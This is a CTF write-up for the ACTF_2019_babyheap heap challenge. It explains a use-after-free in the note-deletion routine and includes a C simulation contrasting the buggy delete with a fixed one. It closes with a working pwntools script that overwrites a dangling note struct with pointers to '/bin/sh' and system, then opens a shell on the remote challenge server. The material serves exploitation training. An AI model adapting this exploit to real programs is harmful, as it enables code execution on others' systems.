This challenge is similar to the hitcontraining_uaf challenge done earlier.
64-bit binary, PIE disabled.
A `bin/sh` string is also present in the binary (the exploit below uses it at 0x602010).
ptr[v1][1] holds a pointer to printf_0 (the print function), whose body is:
Exploit idea:
Each note is a 0x10-byte struct: ptr[i][0] is the content pointer and ptr[i][1] is the print_content function pointer that show calls as ptr[i][1](ptr[i][0]). delete frees the content chunk and then the struct but never clears ptr[i], so the slot keeps pointing at freed memory (use-after-free). After deleting notes 0 and 1, the allocator will hand back the most recently freed 0x10 chunk first, so the next create's malloc(0x10) for the struct receives note 1's old struct and its malloc(0x10) for a 0x10-byte content receives note 0's old struct. Writing 16 bytes of content therefore overwrites note 0's struct in place: ptr[0][0] becomes the address of the bin/sh string and ptr[0][1], which used to be print_content, becomes system. Calling show on index 0 then executes system("/bin/sh") and we get a shell.
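The following C program is an added example, not code from the writeup or from the challenge binary. It models the note layout described above (content pointer followed by print function pointer; the field names are this example's own), a toy two-bin allocator that only reproduces the "most recently freed chunk of a size class is reused first" behaviour of glibc's tcache, a fake_system function standing in for system@plt, and a local "/bin/sh" string standing in for the one at 0x602010. create filling the first empty slot and allocating the struct before the content is an assumption about the challenge. It replays the exploit sequence once against the buggy delete and once against a delete that clears the slot, so you can see exactly why the 0x10 content write lands on note 0's dangling struct and why nulling the pointer defeats it.

```c
#include <stddef.h>
#include <string.h>

/* Note layout inferred from the writeup: ptr[i][0] is the content pointer,
 * ptr[i][1] the print function pointer, 0x10 bytes in total.  Field names
 * are this example's own. */
typedef void (*show_fn)(const char *);
struct note { char *content; show_fn show; };

/* Toy allocator: two LIFO bins standing in for glibc's tcache 0x20 and 0x210
 * bins.  The only property modelled is "most recently freed chunk of a size
 * class is handed out first"; everything else about glibc is ignored. */
#define SLOTS 8
static struct note small_arena[SLOTS];            /* 0x10-byte chunks */
static unsigned char large_arena[SLOTS][0x200];   /* 0x200-byte chunks */
static void *small_free[SLOTS], *large_free[SLOTS];
static int small_top, large_top, small_fresh, large_fresh;

static void *toy_malloc(size_t size) {
    if (size <= sizeof(struct note)) {
        if (small_top) return small_free[--small_top];
        return small_fresh < SLOTS ? (void *)&small_arena[small_fresh++] : NULL;
    }
    if (large_top) return large_free[--large_top];
    return large_fresh < SLOTS ? (void *)large_arena[large_fresh++] : NULL;
}
static void toy_free(void *p) {
    unsigned char *q = p;
    if (q >= (unsigned char *)small_arena && q < (unsigned char *)(small_arena + SLOTS))
        small_free[small_top++] = p;
    else
        large_free[large_top++] = p;
}

/* Stand-ins for the two possible call targets so the outcome can be checked. */
static int last_call;           /* 1 = print_content ran, 2 = fake_system ran */
static const char *last_arg;
static void print_content(const char *s) { last_call = 1; last_arg = s; }
static void fake_system(const char *cmd) { last_call = 2; last_arg = cmd; }

#define MAX_NOTES 16
static struct note *list[MAX_NOTES];   /* the program's ptr[] table */

static void reset_heap(void) {
    memset(small_arena, 0, sizeof small_arena);
    memset(large_arena, 0, sizeof large_arena);
    memset(list, 0, sizeof list);
    small_top = large_top = small_fresh = large_fresh = 0;
    last_call = 0; last_arg = NULL;
}

/* Menu 1 (assumed order): struct first, then content, into the first empty slot. */
int menu_create(size_t size, const void *payload, size_t len) {
    int i = 0;
    while (i < MAX_NOTES && list[i]) i++;
    if (i == MAX_NOTES) return -1;
    struct note *n = toy_malloc(sizeof *n);
    n->content = toy_malloc(size);
    n->show = print_content;
    memcpy(n->content, payload, len > size ? size : len);
    list[i] = n;
    return i;
}
/* Menu 2 as the challenge has it: both chunks freed, slot left dangling (UAF). */
void menu_delete(int idx) {
    toy_free(list[idx]->content);
    toy_free(list[idx]);
}
/* The fix: clear the slot so show() can no longer reach freed memory. */
void menu_delete_fixed(int idx) {
    toy_free(list[idx]->content);
    toy_free(list[idx]);
    list[idx] = NULL;
}
/* Menu 3: indirect call through the struct.  Returns which target ran, -1 if empty. */
int menu_show(int idx) {
    last_call = 0;
    if (!list[idx]) return -1;
    list[idx]->show(list[idx]->content);
    return last_call;
}

static const char binsh[] = "/bin/sh";   /* plays the role of the string at 0x602010 */

/* Replays the writeup's sequence against either delete().  Returns menu_show(0). */
static int replay(void (*del)(int)) {
    unsigned char payload[sizeof(struct note)];
    const char *s = binsh;
    show_fn f = fake_system;                    /* stands in for system@plt */
    reset_heap();
    menu_create(0x200, "index:0", 7);
    menu_create(0x200, "index:1", 7);
    del(0);
    del(1);
    memcpy(payload, &s, sizeof s);              /* p64(0x602010) */
    memcpy(payload + sizeof s, &f, sizeof f);   /* p64(elf.symbols["system"]) */
    menu_create(0x10, payload, sizeof payload); /* 0x10 content chunk == note 0's old struct */
    return menu_show(0);
}
int run_exploit(void) { return replay(menu_delete); }        /* 2: fake_system("/bin/sh") */
int run_fixed(void)   { return replay(menu_delete_fixed); }  /* 1: print_content only */
```

With the buggy delete, the payload written as "content" is read back through list[0] as a struct, so show(0) dispatches to fake_system with the "/bin/sh" pointer. With the fixed delete the same 16 bytes still land in the same chunk, but nothing treats that chunk as a note any more: the third create occupies slot 0 with a fresh struct whose function pointer is print_content, and slot 1 is empty.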
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context(log_level = 'debug')
r = remote("node3.buuoj.cn","26354")
#r=process('./ACTF_2019_babyheap')
elf=ELF('./ACTF_2019_babyheap')
# menu 1: malloc(0x10) for the note struct, then malloc(size) for the content
def create(size,payload):
    r.sendlineafter("Your choice: ",'1')
    r.sendlineafter("Please input size: \n",str(size))
    r.sendafter("Please input content: \n",payload)   # raw bytes, no trailing newline
# menu 2: frees the content chunk and the struct, but leaves ptr[index] dangling
def delete(index):
    r.sendlineafter("Your choice: ",'2')
    r.sendlineafter("Please input list index: \n",str(index))
# menu 3: calls ptr[index][1](ptr[index][0])
def printf(index):
    r.sendlineafter("Your choice: ",'3')
    r.sendlineafter("Please input list index: \n",str(index))
create(0x200,'index:0')
create(0x200,'index:1')
delete(0)          # 0x20 bin: struct0
delete(1)          # 0x20 bin: struct1 -> struct0
#gdb.attach(r)
# struct comes from struct1's old chunk, the 0x10 content from struct0's old chunk,
# so these 16 bytes overwrite note 0's {content ptr, print fn ptr}
create(0x10,p64(0x602010) + p64(elf.symbols["system"]))
printf(0)          # system("/bin/sh") via the dangling ptr[0]
r.interactive()